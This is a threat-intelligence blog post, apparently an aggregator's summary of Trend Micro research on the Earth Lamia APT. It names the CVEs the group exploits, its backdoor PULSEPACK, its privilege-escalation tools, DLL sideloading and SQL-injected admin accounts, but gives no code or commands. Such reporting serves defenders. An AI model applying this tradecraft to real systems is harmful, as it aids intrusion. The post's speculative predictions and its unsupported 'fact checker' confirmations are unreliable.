Inside Earth Lamia: The Rising Cyber Menace Redefining Global APT Threats

By /

Listen to this Post

Featured Image

Introduction: A New Cyber Predator Emerges

Since 2023, a stealthy and relentless APT group known as Earth Lamia has quietly escalated its operations, targeting a wide range of industries across Brazil, India, and Southeast Asia. Far from being a conventional cybercriminal group, Earth Lamia has earned its reputation by exploiting web application vulnerabilities, developing custom malware, and tailoring its tools for precision infiltration and prolonged access. Their ever-evolving tactics, particularly through the use of their bespoke backdoor PULSEPACK and modified open-source tools, signal an alarming shift in the way cyberattacks are carried out.

With each wave of attacks, Earth Lamia adapts and refines its techniques—sidestepping traditional defenses and leaving traces that link their operations to other sophisticated China-nexus threat actors. Their trajectory highlights the increasing overlap between state-backed espionage and financially motivated cybercrime, raising serious concerns for governments, academia, IT infrastructure, and corporations alike.

Earth Lamia’s Evolving Arsenal and Global Campaigns

Trend Research has uncovered Earth Lamia as a rising APT actor that utilizes custom-developed tools to infiltrate organizations in Brazil, India, and Southeast Asia. Since 2023, the group has leveraged SQL injection flaws and public-facing vulnerabilities to access networks and exfiltrate sensitive data. Originally fixated on financial institutions, their targets have now expanded to include logistics firms, online retailers, IT companies, government bodies, and educational institutions.

Their toolkit features custom-developed exploits and backdoors like PULSEPACK, along with heavily modified open-source hacking tools such as BypassBoss. They employ tactics like DLL sideloading, dynamic plugin-based command-and-control architectures, and advanced persistence methods. Earth Lamia doesn’t rely solely on brute force or generic malware; their attacks are tailored, surgical, and stealthy.

Notable vulnerabilities exploited by the group include Apache Struts2 (CVE-2017-9805), GitLab RCE flaws (CVE-2021-22205), CyberPanel and Craft CMS exploits, as well as the recent SAP NetWeaver bug (CVE-2025-31324). After initial access, Earth Lamia typically escalates privileges, moves laterally, and establishes covert tunnels to control compromised networks.

Their signature move is the creation of admin accounts like “sysadmin123” directly through SQL injection commands, providing deep access to databases. Tools such as “certutil.exe” and “JuicyPotato” are used for network reconnaissance and privilege escalation. For persistence, Earth Lamia leverages scheduled tasks, web shells, and hijacked legitimate binaries like “AppLaunch.exe.”

A hallmark of their sophistication is PULSEPACK, a modular .NET backdoor using encrypted WebSocket communication and plugin-based functionality. With the ability to dynamically load payloads on demand, PULSEPACK allows Earth Lamia to minimize detection and maximize adaptability.

Attribution research links Earth Lamia to campaigns previously identified as REF0657 and CL-STA-0048, suggesting overlapping activity with other Chinese-affiliated APTs like DragonRank and even possible coordination with ransomware groups. Although no direct ransomware activity has been confirmed, similarities in tactics and shared infrastructure complicate attribution.

What Undercode Say: Analyzing Earth

Earth Lamia is more than just another APT group. Its ability to adapt, innovate, and shift targets indicates a well-resourced and strategic actor with clear goals. Let’s break down why this campaign stands out:

  1. Modular Malware Tactics: PULSEPACK’s architecture is a prime example of modern malware engineering—modular, encrypted, and command-responsive. It doesn’t just infect and collect; it learns, loads what it needs, and stays hidden.

  2. Industry-Specific Targeting: Earth Lamia doesn’t spread its attacks indiscriminately. It focuses on specific industries during each phase—first finance, then logistics, and now IT, government, and academia. This suggests intelligence-led operations, possibly driven by espionage agendas or economic sabotage.

  3. Sophisticated Lateral Movement: From using tools like “GodPotato” for privilege escalation to deploying web shells and building stealthy admin accounts, the group mimics the tactics of elite cyber forces. Their footprint is designed to look like internal activity, which delays detection.

  4. Tool Customization: Earth Lamia modifies existing hacking tools, stripping out identifying strings and injecting encryption layers. This helps them evade detection and throws off analysts by blurring lines between open-source and proprietary malware.

  5. DLL Sideloading with Security Software: Perhaps the most ironic part of their playbook is using binaries from legitimate security vendors to launch their malware. This is a form of digital judo—using the defender’s strength against them.

  6. Avoidance of Ransomware Tactics: Unlike typical cybercriminals, Earth Lamia avoids ransomware deployments. This hints at long-term strategic goals rather than short-term financial gain.

  7. China-Nexus Attribution: Although conclusive proof remains elusive, IP tracing, shared infrastructure, and coding patterns point to ties with Chinese espionage groups. The use of infrastructure overlapping with DragonRank and UNC5174 strengthens this assumption.

  8. Threat Actor Maturity: Earth Lamia’s ability to develop successive versions of their tools, particularly PULSEPACK’s protocol evolution from TCP to WebSocket, shows software development discipline and a DevOps-like cadence—traits often seen in state-sponsored groups.

  9. Threat to Public-Facing Applications: They prefer to breach through internet-facing apps, targeting platforms like WordPress, GitLab, JetBrains TeamCity, and SAP NetWeaver. This approach widens their attack surface and avoids triggering internal alarms.

  10. Use of Stealthy Plugins: The use of Base64-encoded, AES-encrypted plugins allows on-demand capability delivery, reducing the malware’s static signature and making detection via signature-based tools nearly impossible.

  11. Cross-Group Tool Reuse: Earth Lamia appears to borrow and enhance tools from forums and open-source projects. This underscores the blurring line between criminal hackers and nation-state assets, who increasingly share and repurpose each other’s tools.

  12. Emerging Global Threat: Their expanding geographic footprint and ability to pivot between sectors make Earth Lamia a threat to both government institutions and the private sector worldwide.

  13. Medium-Confidence Attribution Issues: While many clues point toward a China-nexus origin, Earth Lamia has taken steps to obscure direct attribution. This ambiguity allows plausible deniability, a tactic favored in cyber-espionage.

  14. Future-Proofing: Their ongoing refinement of malware indicates a long-term investment in cyber operations, not a one-off campaign.

Fact Checker Results ✅

Earth Lamia is confirmed active since 2023, targeting Brazil, India, and Southeast Asia 🌍
They deploy custom-built tools like PULSEPACK and exploit major public vulnerabilities 🔐
Attribution to Chinese APT groups is suggested but remains with medium confidence 🇨🇳

Prediction: The Road Ahead for Earth Lamia

Given their trajectory, Earth Lamia is unlikely to slow down. We expect the group to:

  1. Expand targeting into the Middle East and Europe, particularly where geopolitical tensions align with China’s interests.
  2. Incorporate AI-assisted evasion techniques into their toolset, making future attacks even harder to detect.
  3. Deepen use of stealthy communication protocols like HTTP/3, DNS tunneling, and decentralized C\&C frameworks.
  4. Possibly collaborate with financially motivated cybercriminal groups for access, laundering, or distraction operations.
  5. Continue exploiting newly disclosed vulnerabilities with zero-day turnaround speed, putting unpatched organizations at greater risk.

To counter this evolving threat, cybersecurity strategies must shift from passive defense to aggressive threat hunting and continuous infrastructure hardening. Earth Lamia isn’t just a cyber threat—it’s a blueprint for future APT behavior.

References:

Reported By: www.trendmicro.com
Extra Source Hub:
https://www.digitaltrends.com
Wikipedia
Undercode AI

Image Source:

Unsplash
Undercode AI DI v2

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Explore More: